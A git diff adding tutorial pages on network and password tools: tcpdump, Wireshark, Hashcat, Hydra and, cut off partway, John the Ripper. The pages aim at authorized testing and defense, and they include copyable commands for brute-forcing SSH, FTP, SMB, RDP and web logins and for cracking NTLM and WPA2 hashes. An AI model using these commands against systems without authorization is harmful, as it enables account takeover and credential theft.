Limit number of files with `-W` (when using `-C`): + + ```bash + sudo tcpdump -i eth0 -s 0 -w capture.pcap -C 50 -W 5 + ``` + + This keeps 5 files of 50MB each in a rotating buffer. + +## Reading & Inspecting Captures + +Open a pcap with tcpdump (text output): + +```bash +tcpdump -r capture.pcap -nn -tttt +``` + +Open the same file in Wireshark for GUI analysis: + +```bash +wireshark capture.pcap & +# or +tshark -r capture.pcap -Y 'http' -V +``` + +`tshark` is the CLI counterpart to Wireshark and supports Wireshark-style display filters. + +## Common Workflows / Examples + +### 1) Capture ARP traffic (good for spotting ARP spoofing) + +```bash +sudo tcpdump -i eth0 arp -n -vv +``` + +### 2) Capture only HTTP traffic and show ASCII payload + +```bash +sudo tcpdump -i eth0 -nn -s 0 -A 'tcp port 80' +``` + +### 3) Save DNS queries (UDP port 53) to file for later analysis + +```bash +sudo tcpdump -i eth0 -nn -s 0 udp port 53 -w dns-capture.pcap +``` + +### 4) Capture traffic to/from a host but exclude SSH noise (port 22) + +```bash +sudo tcpdump -i eth0 -nn -s 0 'host 192.168.1.10 and not port 22' -w host-no-ssh.pcap +``` + +### 5) Capture a single TCP session by 4-tuple + +If you see a suspicious TCP conversation in Wireshark, filter by IPs & ports to record that session alone: + +```bash +sudo tcpdump -i eth0 -nn -s 0 'src 10.0.0.2 and dst 192.168.1.10 and tcp port 4444' -w session.pcap +``` + +## Performance & Practical Tips + +* Use `-s 0` to capture full packets when you need payloads; otherwise set an appropriate snaplen to reduce disk usage. +* Use `-nn` for raw numeric addresses (avoids DNS/port lookups which slow output). +* Capture on the host where traffic passes (e.g., a router, span/mirror port, or `any` for multi-interface capture). + + ```bash + sudo tcpdump -i any -nn -s 0 -w all-interfaces.pcap + ``` +* If running on busy networks, prefer writing to disk (`-w`) rather than printing to console to avoid drops. +* Consider compression after capture (gzip) to save space: `gzip capture.pcap` — but only after closing the file. + +## Troubleshooting & Common Pitfalls + +* **Missing packets**: High traffic or small buffers can drop packets. Use dedicated capture hosts or mirror ports. +* **Permissions**: If you can’t capture on Linux, add your user to the `wireshark` or `dumpcap` group (distribution-dependent) or run with `sudo`. +* **Time sync**: For forensic correlation, ensure host clocks are synchronized (NTP) — `-tttt` helps readable timestamps. +* **Encrypted traffic**: Captures of TLS/HTTPS won’t reveal plaintext. For deep inspection in controlled labs, use server private keys or TLS key logging (not possible for third-party traffic). + +## Hands-On Lab Ideas + +1. **DNS Query Capture** + + * Task: Run `tcpdump -i eth0 -nn udp port 53 -w dns.pcap` then open `dns.pcap` in Wireshark and identify most frequent domain queries. + +2. **HTTP Session Extraction** + + * Task: Use `tcpdump -i eth0 -s 0 -w http.pcap 'tcp port 80'` while loading a website on a test VM. Open in Wireshark and use *Follow TCP Stream* to view request/response. + +3. **ARP Poisoning Detection** + + * Task: Simulate ARP spoofing in a lab and capture ARP traffic `tcpdump -i eth0 arp -w arp.pcap`. Check unusual duplicate MAC-to-IP mappings. + +4. **SSH Noise Filtering** + + * Task: Capture all traffic to a host while excluding SSH: `tcpdump -i eth0 'host 10.0.0.5 and not port 22' -w filtered.pcap` and analyze anomalies. + +## Legal & Ethical Reminder + +Packet captures can include **sensitive information** (credentials, tokens, PII). +**Always** obey laws and organizational rules: capture only on systems you own or have explicit permission to analyze. Improper use can be illegal and unethical. + +## Summary Checklist + +* [ ] Choose correct interface with `-i`. +* [ ] Use BPF capture filters to reduce noise (applied at kernel-level). +* [ ] Use `-w` to write pcap files for later analysis (Wireshark/tshark). +* [ ] Rotate files with `-C`, `-W`, or `-G` to prevent disk exhaustion. +* [ ] Use `-s 0` for full-packet captures when payload is required. +* [ ] Prefer `-nn` and `-tttt` for readable, fast output. +* [ ] Always act ethically; get permission. \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/network-analysis/wireshark-basics.mdx b/docs/cybersecurity/cybersecurity-tools/network-analysis/wireshark-basics.mdx new file mode 100644 index 0000000..e5f41d4 --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/network-analysis/wireshark-basics.mdx @@ -0,0 +1,177 @@ +--- +title: "Wireshark Basics" +description: "Learn how to capture, analyze, and understand network packets using Wireshark. A beginner-friendly guide to mastering one of the most powerful network analysis tools." +tags: [wireshark, network-analysis, cybersecurity, tools, packet-sniffing] +--- + +Welcome to your first hands-on lesson in network analysis. In this guide, you’ll learn how to use **Wireshark**, the world’s most popular and powerful **packet analyzer**. + +Wireshark allows you to **see what’s happening on your network in real time**, which makes it a go-to tool for cybersecurity analysts, network engineers, and ethical hackers alike. + +## What Is Wireshark? + +**Wireshark** is an open-source tool used to capture and inspect data packets that travel through a network. It helps you understand how devices communicate, detect problems, and even identify potential security threats. + +Think of it as a **microscope for your network**, every packet (data unit) that moves through your system can be analyzed in detail. + +## Why Wireshark Is Important in Cybersecurity + +Wireshark is not just for engineers, it’s a critical tool for **cyber defenders**. +Here’s why it’s so valuable: + +* **Detects suspicious network activity** (like malware communication or data leaks). +* **Analyzes protocols** (HTTP, TCP, DNS, etc.) to identify vulnerabilities. +* **Troubleshoots slow networks or misconfigurations.** +* **Trains ethical hackers** to understand how packets move and where to find weaknesses. + +It’s one of those tools that **every cybersecurity professional** must learn to master. + +## Installing Wireshark + +You can install Wireshark on Windows, macOS, or Linux. + +### Windows + +1. Go to [wireshark.org/download](https://www.wireshark.org/download.html) +2. Choose the **Windows installer (.exe)**. +3. During setup, allow installation of **WinPcap** or **Npcap** (required for packet capturing). +4. Complete installation and open Wireshark. + +### Linux (Ubuntu/Debian) + +```bash +sudo apt update +sudo apt install wireshark -y +``` + +:::info Optional + +Run `sudo usermod -aG wireshark $USER` to capture packets without root access. + +::: + +### macOS + +You can install Wireshark using [Homebrew](https://brew.sh): + +```bash +brew install wireshark +``` + +## Getting Started with Wireshark + +Once you open Wireshark, here’s what you’ll see: + +* A list of **network interfaces** (like Wi-Fi, Ethernet, etc.). +* Each interface shows real-time traffic activity. +* The “shark fin” icon starts capturing packets. + +### To Start Capturing: + +1. Select your active network interface (e.g., Wi-Fi). +2. Click the **blue shark fin icon** or press `Ctrl + E`. +3. Watch packets begin to appear in real-time. + +You’re now officially *sniffing packets*! + +## Understanding Wireshark’s Interface + +Wireshark’s interface is divided into **three main panels:** + +| Panel | Description | +| ----------------------- | ------------------------------------------------------------- | +| **Packet List Pane** | Displays all captured packets chronologically. | +| **Packet Details Pane** | Shows decoded details of a selected packet (protocol layers). | +| **Packet Bytes Pane** | Displays raw packet data in hexadecimal and ASCII. | + +Hovering over a packet shows its source, destination, protocol, and brief info. + +## Filtering Packets + +Network captures can contain **thousands of packets**, so filters help you focus on what matters. + +### Display Filter Examples + +| Filter | Description | +| ------------------------ | --------------------------------------- | +| `ip.addr == 192.168.1.1` | Show all packets to/from a specific IP. | +| `tcp.port == 80` | Display only HTTP (port 80) traffic. | +| `dns` | Filter only DNS packets. | +| `http` | Show only HTTP protocol traffic. | +| `tcp.flags.syn == 1` | Capture TCP handshake attempts. | + +You can combine filters using logical operators like `and`, `or`, `not`. + +:::tip +Use the filter bar’s autocomplete — Wireshark helps you find valid filter syntax! +::: + +## Analyzing Common Protocols + +Wireshark can decode hundreds of protocols. Here are some you’ll analyze most often: + +### HTTP (Web Traffic) + +You can view web requests and responses in plain text. + +* Filter: `http` +* Insight: Useful for analyzing GET/POST requests and cookies. + +### DNS (Domain Name System) + +Helps map domain names to IP addresses. + +* Filter: `dns` +* Insight: Detect suspicious or malicious domain lookups. + +### TCP (Transmission Control Protocol) + +Used for connection-oriented communication. + +* Filter: `tcp` +* Insight: Check for retransmissions or incomplete handshakes. + +## Real-World Example: Detecting a Suspicious Packet + +Imagine you notice a system sending packets to an **unknown IP** outside your network. + +1. Apply the filter: + + ```bash + ip.dst == 45.67.89.12 + ``` +2. Inspect the **payload data** — if it’s encrypted or unusual, it might indicate malware activity. +3. Use **Follow → TCP Stream** to view the conversation in sequence. + +This helps analysts identify whether data is being **exfiltrated** or **malicious communication** is happening. + +## Useful Wireshark Features + +| Feature | Use Case | +| -------------------------------------- | ------------------------------------------------ | +| **Capture Filters** | Define what packets to capture before recording. | +| **Follow TCP Stream** | View all packets in a communication stream. | +| **Export Packets** | Save capture data (.pcap) for deeper analysis. | +| **Statistics → Protocol Hierarchy** | See which protocols dominate your traffic. | +| **IO Graphs** | Visualize network activity over time. | + +These features turn Wireshark into a complete **network intelligence platform**. + +## Ethical Usage Reminder + +While Wireshark is incredibly powerful, it can also capture **sensitive data** such as passwords or session tokens. + +> Never use Wireshark on networks you don’t own or have explicit permission to analyze. + +Use it only for **authorized learning, testing, or troubleshooting**. + +## Summary + +Wireshark is your gateway to understanding how networks truly work. By mastering it, you can: + +* Analyze traffic at a packet level +* Detect anomalies and intrusions +* Learn how attackers move data stealthily +* Troubleshoot issues like a network pro + +It’s a **must-have skill** for anyone serious about cybersecurity. \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/password-and-authentication/hashcat-usage.mdx b/docs/cybersecurity/cybersecurity-tools/password-and-authentication/hashcat-usage.mdx new file mode 100644 index 0000000..16b9b30 --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/password-and-authentication/hashcat-usage.mdx @@ -0,0 +1,318 @@ +--- +title: "Hashcat — Usage & Practical Guide" +sidebar_label: "Hashcat — Usage" +description: "Hands-on guide to Hashcat — GPU-accelerated password recovery tool. Covers installation, attack modes (dictionary, mask, combinator), rule usage, tuning, hash formats, performance tips, and safe lab exercises." +tags: [hashcat, password-cracking, GPU, tools, cybersecurity, forensics] +--- + +**Hashcat** is the industry-standard GPU-accelerated password cracking tool. Where CPU tools like John the Ripper are great for many tasks, Hashcat excels at high-speed, large-scale cracking using modern GPUs. This guide shows how to install Hashcat, pick attack modes, craft masks and rules, handle salts and formats, tune performance, and run ethical, repeatable labs. + +:::warning Ethics reminder +Use Hashcat **only** in authorized test environments or on data you own. Cracking third-party credentials without permission is illegal. +::: + +## Installation (Quick) + +### Linux (recommended: Ubuntu / Kali) + +```bash +# On Debian/Ubuntu/Kali (drivers + hashcat) +sudo apt update +sudo apt install -y hashcat +# Or get the latest binary from https://hashcat.net/hashcat/ +``` + +### macOS + +Use Homebrew for community builds: + +```bash +brew install hashcat +``` + +### Windows + +Download the official package from [https://hashcat.net/hashcat/](https://hashcat.net/hashcat/) and extract. Ensure GPU drivers (NVIDIA or AMD) are installed and up to date. + +### Verify + +```bash +hashcat --help +hashcat -I # lists devices (GPUs) recognized +``` + +## Hashcat Concepts & Workflow + +1. **Identify** the hash type and format. +2. **Select** an attack mode (dictionary, mask, combinator, rule-based, hybrid). +3. **Prepare** wordlists, rules, masks, and GPU settings. +4. **Run** Hashcat with the correct `-m` (hash type) and `-a` (attack mode). +5. **Review** cracked results and produce a remediation report. + +## Common Options + +| Option | Meaning | +| ------------------------- | ------------------------------------------------------------------------------- | +| `-m ` | Hash type (see list below) | +| `-a ` | Attack mode (0=dictionary,1=comb,3=mask,6=hybrid wordlist+mask,7=mask+wordlist) | +| `-o ` | Output cracked passwords to file | +| `--username` | Strip username:hash file format and use only hash | +| `-w ` | Workload profile (1..4) — affects GPU utilization | +| `-O` | Optimized kernel (faster but limited to shorter passwords) | +| `--show` | Display cracked hashes from potfile | +| `--status` | Show runtime status periodically | +| `--restore` / `--session` | Resume a previous session | +| `-r ` | Apply custom rule file | +| `-i` | Incremental mode (with masks) | +| `-d ` | Specify GPU device(s) | + +Example: + +```bash +hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt -o found.txt --status --status-timer=10 +``` + +## Common `-m` Hash Type Examples + +| `-m` | Format | +| ------- | ---------------------------------------------- | +| `0` | MD5 | +| `100` | SHA1 | +| `1400` | SHA256 | +| `1800` | SHA512 | +| `1000` | NTLM | +| `3200` | bcrypt (OpenBSD) | +| `7400` | sha1(ssh) | +| `22000` | WPA/WPA2 (using hcxdumptool/hcxtools workflow) | + +Full list: `hashcat --help` or [https://hashcat.net/wiki/doku.php?id=hashcat](https://hashcat.net/wiki/doku.php?id=hashcat) + +## Identifying Hash Types + +Use `hashid` or `hash-identifier`, or inspect application code/DB schema. Wrong `-m` will fail or produce garbage. Example: + +```bash +hashid hashes.txt +``` + +## Attack Modes (Practical) + +### 1. Dictionary Attack (`-a 0`) — fast and effective + +Uses words from a wordlist (optionally with rules to mutate words). + +```bash +hashcat -m 1000 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule +``` + +`best64.rule` applies common mutations (capitalization, suffixes, leetspeak). + +### 2. Mask Attack (`-a 3`) — targeted brute force + +Great when you know password structure (e.g., `?l?l?l?l?d?d` for 4 letters + 2 digits). + +Common charsets: + +* `?l` = lowercase +* `?u` = uppercase +* `?d` = digits +* `?s` = special +* `?a` = all + +Example: + +```bash +hashcat -m 1000 -a 3 hashes.txt ?l?l?l?l?d?d -w 3 +``` + +Use `-i` (incremental) to try shorter lengths as well: + +```bash +hashcat -m 1000 -a 3 -i hashes.txt ?d?d?d?d?d +``` + +### 3. Combinator Attack (`-a 1`) — combine two wordlists + +Combine `wordlist1` + `wordlist2` (useful for passphrase generation). + +```bash +hashcat -m 1000 -a 1 hashes.txt wordlist1.txt wordlist2.txt +``` + +### 4. Hybrid (Wordlist + Mask) (`-a 6` or `-a 7`) + +Append or prepend masks to words (e.g., word + 2 digits). + +```bash +# word + 2 digits +hashcat -m 1000 -a 6 hashes.txt /usr/share/wordlists/rockyou.txt ?d?d +# 2 digits + word +hashcat -m 1000 -a 7 hashes.txt /usr/share/wordlists/rockyou.txt ?d?d +``` + +### 5. Rules Engine (`-r rules/file.rule`) + +Rules mutate words efficiently. Combine with dictionary or combinator. + +Example with `rules/best64.rule`: + +```bash +hashcat -m 1800 -a 0 hashes.txt wordlist.txt -r rules/best64.rule +``` + +## Performance Tips & GPU Tuning + +* Use latest GPU drivers and proper OpenCL/CUDA support. +* Choose appropriate workload (`-w 3` or `-w 4` for high utilization). +* Use `--optimized-kernel-enable` (`-O`) for faster kernels (but limited password length). +* Benchmark: `hashcat -b` to see speed on your hardware. +* Use multiple GPUs with `-d 1,2` or let Hashcat auto-detect. +* For large jobs, run with a session name: `--session=myjob` and `--status`/`--restore`. + +Example performance run: + +```bash +hashcat -m 1000 -a 3 hashes.txt ?a?a?a?a?a -w 4 --session=fasttest +``` + +## Handling Salts & Complex Formats + +* Many modern hashes include salts (e.g., `sha256(salt+pass)`); Hashcat supports many salted formats — pick correct `-m`. +* For custom formats, preprocess or convert to Hashcat-supported format. +* For bcrypt/scrypt/Argon2, expect slow cracking; focus on targeted wordlists and MFA enforcement rather than mass brute force. + +## Tools & Utilities for Wordlists & Rules + +* `hashcat-utils` (e.g., `hcstatgen`, `maskprocessor`) — generate masks and stats. +* `maskprocessor` (mpc) — create custom mask lists. +* `cupp` — common user password profiler to create targeted wordlists. +* `rockyou.txt`, `SecLists` (GitHub) — excellent starting wordlists. +* `john --rules` or custom scripts to generate candidate lists. + +Generate a targeted list with `cewl` (crawl site for words): + +```bash +cewl -w words.txt https://example.com +``` + +Combine and uniq: + +```bash +cat words.txt other.txt | sort -u > combined.txt +``` + +## WPA/WPA2 & PMKID Workflow + +Hashcat supports `.hccapx` or the newer `22000` format. Use `hcxdumptool` + `hcxpcapngtool` to capture and convert. + +Example: + +```bash +# Convert pcapng to 22000 +hcxpcapngtool -o capture.22000 capture.pcapng + +# Crack WPA handshake +hashcat -m 22000 capture.22000 /usr/share/wordlists/rockyou.txt -w 3 +``` + +## Practical Examples + +1. **NTLM dictionary + rules** + +```bash +hashcat -m 1000 -a 0 ntlm_hashes.txt /usr/share/wordlists/rockyou.txt -r rules/best64.rule -o found.txt +``` + +2. **SHA256 mask incremental** + +```bash +hashcat -m 1400 -a 3 -i --increment-min=6 --increment-max=10 hashes.txt ?a?a?a?a?a?a?a?a -w 4 +``` + +3. **Resume a session** + +```bash +hashcat --session=myrun --restore +``` + +4. **Show cracked** + +```bash +hashcat --show -m 1000 hashes.txt +``` + +## Output & Reporting + +* Hashcat writes results to `hashcat.potfile` by default. Use `-o results.txt` to capture outputs. +* `--show` prints cracked passwords in `hash:plaintext` or `username:hash:plaintext` if `--username` used. +* Treat cracked plaintext as **sensitive** — include only aggregated findings in external reports (e.g., “X accounts weak; Y cracked”), and store evidence securely. + +Example to export in readable format: + +```bash +hashcat -m 1000 --show hashes.txt > cracked.txt +``` + +## Hands-On Lab Ideas (Safe) + +1. **Local MD5 Cracking Lab** + + * Create test hashes: + + ```bash + echo -n "password" | md5sum > md5.txt + ``` + * Run: + + ```bash + hashcat -m 0 -a 0 md5.txt /usr/share/wordlists/rockyou.txt -o found.txt + ``` + +2. **NTLM Windows Hashes (Local)** + + * Extract SAM hashes in a lab, convert to Hashcat format, and run wordlist + mask. + +3. **WPA Handshake** + + * Use a test AP in a lab, capture handshake with `hcxdumptool`, convert to `22000` and crack with small wordlist. + +4. **Mask Tuning** + + * If you know password policy (e.g., 2 letters + 4 digits), craft masks to drastically reduce search space. + +## Best Practices & Tips + +* **Targeted > Exhaustive:** Use intelligence (usernames, patterns) to craft masks/wordlists instead of blind brute force. +* **Use rules wisely:** A small set of effective rules yields more results than brute forcing everything. +* **Avoid long full keyspace masks** unless you have massive GPU clusters. +* **Keep GPU temps monitored** and use adequate cooling. Hashcat can push cards hard. +* **Use sessions & restores** for long-running jobs. +* **Combine Hashcat with John/other tools** — each tool has strengths (Hashcat = GPU speed, John = flexibility). + +## Legal & Ethical Recap + +* Always get **written permission** before running Hashcat against any system you do not own. +* Treat cracked data as **sensitive evidence**. Securely store or destroy plaintexts after reporting. +* Use Hashcat to strengthen defenses: enforce MFA, migrate to strong hash algorithms (bcrypt/Argon2), and mandate strong passphrases. + +## Quick Reference Commands + +```bash +# Benchmark your GPUs +hashcat -b + +# Dictionary + rules +hashcat -m 1000 -a 0 hashes.txt rockyou.txt -r rules/best64.rule -o found.txt + +# Mask attack +hashcat -m 1000 -a 3 hashes.txt ?l?l?l?l?d?d -w 3 + +# Hybrid (word + mask) +hashcat -m 1000 -a 6 hashes.txt rockyou.txt ?d?d + +# WPA2 (22000) +hashcat -m 22000 capture.22000 wordlist.txt -w 3 + +# Show cracked +hashcat --show -m 1000 hashes.txt +``` \ No newline at end of file diff --git a/docs/cybersecurity/cybersecurity-tools/password-and-authentication/hydra-password-cracking.mdx b/docs/cybersecurity/cybersecurity-tools/password-and-authentication/hydra-password-cracking.mdx new file mode 100644 index 0000000..860d528 --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/password-and-authentication/hydra-password-cracking.mdx @@ -0,0 +1,256 @@ +--- +title: "Hydra Password Cracking & Brute-Forcing" +description: "Practical guide to THC Hydra — a fast, flexible network login cracker. Learn installation, common attack modes (SSH, FTP, HTTP forms), command examples, tuning, defenses, and safe lab exercises." +sidebar_label: "Hydra Password Cracking" +tags: [hydra, password-cracking, tools, brute-force, cybersecurity, ethical-hacking] +--- + +**THC Hydra** (often just *Hydra*) is a high-speed network login cracker used by penetration testers to evaluate how resilient services are to credential-guessing attacks. +Hydra supports dozens of protocols (SSH, FTP, HTTP(S) forms, SMB, RDP, POP3, SMTP, and more) and can use username/password lists, combinations, and basic rules. + +This guide teaches you how to use Hydra responsibly: install it, run common attack types in a lab, tune performance, detect/avoid noisy behavior, and implement defenses. + +:::warning Ethical reminder +Brute-forcing credentials against systems you do not own or explicitly have permission to test is illegal and unethical. Use only in authorized labs or sanctioned engagements. +::: + +## What Hydra Is Good For + +* Testing login rate limits and account lockout policies. +* Measuring how quickly a service can be abused with credential lists. +* Finding weak or reused credentials across services. +* Demonstrating the need for multi-factor authentication (MFA) and throttling. + +Hydra is **not** a tool for exploitation, it finds weak credentials; the risk and remediation follow from what those credentials allow. + +## Installation + +Hydra is included in most pentesting distributions (Kali, Parrot). To install on Debian/Ubuntu: + +```bash +sudo apt update +sudo apt install hydra -y +``` + +To build from source (recommended for latest features): + +```bash +git clone https://github.com/vanhauser-thc/thc-hydra.git +cd thc-hydra +./configure +make +sudo make install +``` + +Verify installation: + +```bash +hydra -h +``` + +## Basic Usage Concepts + +Hydra syntax follows this pattern: + +``` +hydra [options] +``` + +Common options: + +* `-L ` — file with usernames (one per line) +* `-l ` — single username +* `-P ` — file with passwords +* `-p ` — single password +* `-t ` — number of parallel tasks (threads) +* `-s ` — specify port (if nondefault) +* `-V` — verbose (show tried attempts) +* `-o ` — write results to file +* `-f` — exit after first valid login (useful to stop early) +* `-e nsr` — try additional modes (n = null password, s = same as user, r = reverse user) +* `-W` — wait between attempts (seconds) — useful to slow down and avoid lockouts + +Example minimal form: + +```bash +hydra -L users.txt -P passwords.txt ssh://192.168.56.101 -t 4 -o results.txt +``` + +## Protocol Examples + +### SSH (Common) + +Test SSH logins using a username list and wordlist: + +```bash +hydra -L /usr/share/wordlists/usernames.txt -P /usr/share/wordlists/rockyou.txt \ + -t 4 -f -o ssh_hits.txt ssh://192.168.56.101 +``` + +Notes: + +* Use `-t` to control parallelism; more threads = faster but noisier. +* `-f` stops Hydra after the first valid credential is found for a target. + +### FTP + +```bash +hydra -L users.txt -P passwords.txt ftp://192.168.56.102 -t 6 -o ftp_hits.txt +``` + +### HTTP Form (Web Login) + +Hydra supports HTML form-based logins — you must identify form field names and the login POST URL. + +1. Capture the login request (e.g., with Burp or browser devtools). Identify: + + * POST URL: `http://target/login.php` + * username field: `user` + * password field: `pass` + * any hidden tokens (if present) — handle or omit as required. + +2. Run Hydra: + +```bash +hydra -L users.txt -P passwords.txt 192.168.56.103 http-post-form \ + "/login.php:user=^USER^&pass=^PASS^:F=incorrect" -t 8 -o http_hits.txt +``` + +Explanation of `http-post-form` string: + +``` +"::" +``` + +* `^USER^` and `^PASS^` are placeholders Hydra replaces. +* `F=incorrect` is a string Hydra will search in the response to determine a failed login (change to match the app’s error text). +* You can also use `S=string` to look for success indicators. + +### SMB / Windows (smb) + +```bash +hydra -L users.txt -P passwords.txt -t 4 smb://192.168.56.104 -vV -o smb_hits.txt +``` + +### RDP + +```bash +hydra -L users.txt -P passwords.txt rdp://10.0.0.5 -t 2 -o rdp_hits.txt +``` + +Hydra supports many modules — list them with: + +```bash +hydra -U +``` + +## Tuning Performance vs Noise + +* **Threads (`-t`)**: More threads speed up attacks but increase network traffic and detection probability. Start with `-t 4` and adjust. +* **Parallel Targets**: Hydra can target many hosts; use caution across networks. +* **Timing**: Use `-W` (wait) or scripting to slow down attempts to test lockout policies. +* **Exit on Success (`-f`)**: Stops attempts on first success to reduce noise. +* **Polite Mode**: Although Hydra has no explicit “polite” flag, combine low `-t`, `-W`, and per-target limits to be less disruptive. + +## Detection & Defense (What to Test & How to Harden) + +When you run Hydra (ethically), you’re validating defenses. Key defensive controls to implement and verify: + +1. **Rate-limiting** — per-IP and per-account throttling prevents rapid attempts. +2. **Account Lockout / Progressive Delays** — lock after N failed attempts or increase delay progressively. +3. **MFA (Multi-Factor Authentication)** — renders password-only attacks ineffective. +4. **IP Reputation & Geo-Blocking** — block suspicious sources or unknown geographies. +5. **Login Anomaly Detection** — SIEM/EDR alerts on many failed attempts or new IPs. +6. **CAPTCHAs** — present after repeated failures to block automated tools. +7. **Strong Password Policies** — length, complexity, and banned lists (e.g., against rockyou). +8. **Monitor & Alert** — log failed authentication spikes and alert SOC. + +Test each control in a lab: + +* Configure rate-limiting and run Hydra to confirm attempts are throttled. +* Test account lockout and ensure lockouts are logged and alerted. + +## Hands-On Labs (Safe & Local) + +### Lab A — SSH Brute-Force in a Test VM + +1. Create two VMs: Kali (attacker) and an Ubuntu server (target). +2. On target, create test users with known weak & strong passwords. +3. From Kali: + +```bash +hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 -f -o ssh_lab_results.txt ssh://192.168.56.101 +``` + +4. Observe successful logins and measure how many attempts before lockout (if enabled). + +### Lab B — Test Web Login Rate-Limiting + +1. Deploy a simple web login app in a local staging environment that supports account lockout or rate-limiting. +2. Identify login POST payload and error messages. +3. Run a slow Hydra attack: + +```bash +hydra -L users.txt -P small-passwords.txt 192.168.56.103 http-post-form \ +"/login.php:user=^USER^&pass=^PASS^:F=Invalid&-w" -t 2 -W 2 +``` + +4. Observe whether rate-limits trigger and whether alerts are logged. + +### Lab C — Test MFA Effectiveness + +1. Enable MFA on a test account. +2. Attempt a password-only brute force with Hydra. +3. Confirm that even correct passwords fail without second factor, demonstrates MFA’s value. + +## Handling Captchas & CSRF Tokens + +* **CAPTCHAs**: Hydra cannot bypass CAPTCHAs. If a login triggers CAPTCHA, brute-forcing is effectively blocked unless captcha is bypassed (illegal/complex). +* **CSRF / Anti-CSRF tokens**: For form attacks, you may need to handle dynamic tokens. Common approaches: + + * Use a Burp macro to fetch a fresh token per attempt (manual/automated workflows). + * Write a custom script to fetch token, then call Hydra with that token — but this often defeats Hydra’s simplicity and is complex. For lab testing, disable token verification or handle via custom tooling. + +## Output & Reporting + +* Hydra writes successful attempts to screen and, if specified, to `-o` output file. +* For reports, include: + + * Which services were tested (hosts, ports). + * Username/password pairs found (treat passwords as sensitive). + * Timeframe and number of attempts. + * Defensive controls observed (lockouts, rate-limits, CAPTCHAs). + * Remediation steps (MFA, throttling, password policies). + +**Sensitive handling:** Never publish plaintext credentials in public reports. Provide findings in a secure, internal channel and recommend forced resets and MFA. + +:::note Common Pitfalls & Notes +* **False Positives:** Some services reply similarly on success/failure; validate hits manually. +* **Blocked by WAF / IDS:** Web application firewalls may block or distort responses—interpret results carefully. +* **Network Constraints:** Large wordlists + high threads can saturate bandwidth or trigger upstream security devices. +* **Hydra Limitations:** It’s username/password-focused. It doesn’t handle complex multi-step auth flows easily. +::: + +## Quick Command Cheat Sheet + +```bash +# SSH: username list + password list +hydra -L users.txt -P passwords.txt -t 4 -f -o ssh_hits.txt ssh://192.168.56.101 + +# FTP +hydra -L users.txt -P passwords.txt ftp://192.168.56.102 -t 6 -o ftp_hits.txt + +# HTTP form (change F= to your app's failure string) +hydra -L users.txt -P passwords.txt 192.168.56.103 http-post-form \ + "/login.php:user=^USER^&pass=^PASS^:F=Invalid username or password" -t 8 -o http_hits.txt + +# SMB +hydra -L users.txt -P passwords.txt -t 4 smb://192.168.56.104 -vV -o smb_hits.txt + +# Stop after first login per target +hydra -L users.txt -P passwords.txt -f ssh://192.168.56.101 +``` + +## Final Thoughts + +Hydra is a practical, fast tool to validate authentication resilience and to demonstrate the value of basic defensive controls like rate-limiting, account lockouts, and MFA. Use it to harden systems — not to attack them. Document tests, obtain authorization, and always handle discovered credentials with strict confidentiality. diff --git a/docs/cybersecurity/cybersecurity-tools/password-and-authentication/john-the-ripper.mdx b/docs/cybersecurity/cybersecurity-tools/password-and-authentication/john-the-ripper.mdx new file mode 100644 index 0000000..ceaa9c5 --- /dev/null +++ b/docs/cybersecurity/cybersecurity-tools/password-and-authentication/john-the-ripper.mdx @@ -0,0 +1,262 @@ +--- +title: "John the Ripper (Password Cracking)" +sidebar_label: "John the Ripper" +description: "Practical guide to John the Ripper — installation, workflows (identification → wordlist → rules → incremental), common commands, hash formats, and safe hands-on labs." +tags: [john-the-ripper, password-cracking, tools, cybersecurity, forensics] +--- + +**John the Ripper** (often abbreviated *John*) is a powerful, flexible password-cracking tool used by security professionals to test password strength and recover lost credentials in controlled environments. It’s not magic, it’s a set of strategies (wordlists, rules, and brute-force) combined with efficient implementations for many hash formats. + +This guide gives you practical, hands-on knowledge: how to identify hashes, run common cracking modes, tune performance, and report results — all with ethical safeguards in mind. + +:::warning Ethics & Legality +Only use John on systems and data you own or where you have explicit written permission. Unauthorized cracking is illegal and unethical. +::: + +## What John Can Do + +* Crack a wide range of hash types (MD5, SHA variants, NTLM, bcrypt, etc.). +* Work in many modes: **single**, **wordlist (+rules)**, **incremental (brute-force)**, and **external**. +* Parse and combine password files (e.g., `/etc/passwd` + `/etc/shadow`) using helper tools. +* Resume sessions, export cracked passwords, and integrate with other workflows. + +There are two commonly used builds: +* **John (core)** — stable and lightweight. +* **John Jumbo** — extended format and OpenCL/GPU support (recommended for broader format support). + +## Installing John + +### Linux (Debian / Ubuntu) + +```bash +# Core package (works but limited) +sudo apt update +sudo apt install john -y + +# Recommended: install John Jumbo from source for extra formats & OpenCL +sudo apt install build-essential libssl-dev libbz2-dev libz-dev \ + libgcrypt20-dev pkg-config libopenmpi-dev git -y + +git clone https://github.com/openwall/john -b bleeding-jumbo john-jumbo +cd john-jumbo/src +./configure +make -s clean && make -sj4 +# Binary will be in ../run/ +``` + +### macOS (Homebrew) + +```bash +brew install john-jumbo +``` + +### Windows + +Use the precompiled binaries from the John project or use WSL (recommended) for parity with Linux commands. + +## Identify Hash Type + +John supports many formats, but you should identify the hash type first. + +* Quick list of supported formats: + +```bash +john --list=formats | less +``` + +* Use helper tools to detect hash type (examples): `hash-identifier`, `hashid`, or online detectors (use cautiously and privately). + Example: + +```bash +hashid 098f6bcd4621d373cade4e832627b4f6 +# Output will suggest MD5, etc. +``` + +## Common Workflows + +### 1) Wordlist Attack (+ Rules) — Fast & Effective + +This is the most common workflow: feed John a wordlist (dictionary) and optionally apply **rules** that modify words (add numbers, leetspeak, suffixes, capitalization). + +```bash +john --wordlist=/usr/share/wordlists/rockyou.txt --rules hashes.txt +``` + +* `--rules` applies rule sets defined in `john.conf` (default rules are solid). +* `rockyou.txt` is a classic wordlist (usually in Kali: `/usr/share/wordlists/rockyou.txt`). + +**Show cracked results:** + +```bash +john --show hashes.txt +``` + +### 2) Single Mode — Grep-style quick wins + +Single mode uses information from username fields and other file metadata to mutate likely passwords (very fast for `/etc/shadow` style inputs). + +```bash +john --single passwd_unshadowed.txt +``` + +### 3) Incremental (Brute-force) — Exhaustive + +Try all combinations for a given character set/length. Very powerful but slow; ideal for short weak passwords. + +```bash +john --incremental hashes.txt +# Or specify a specific 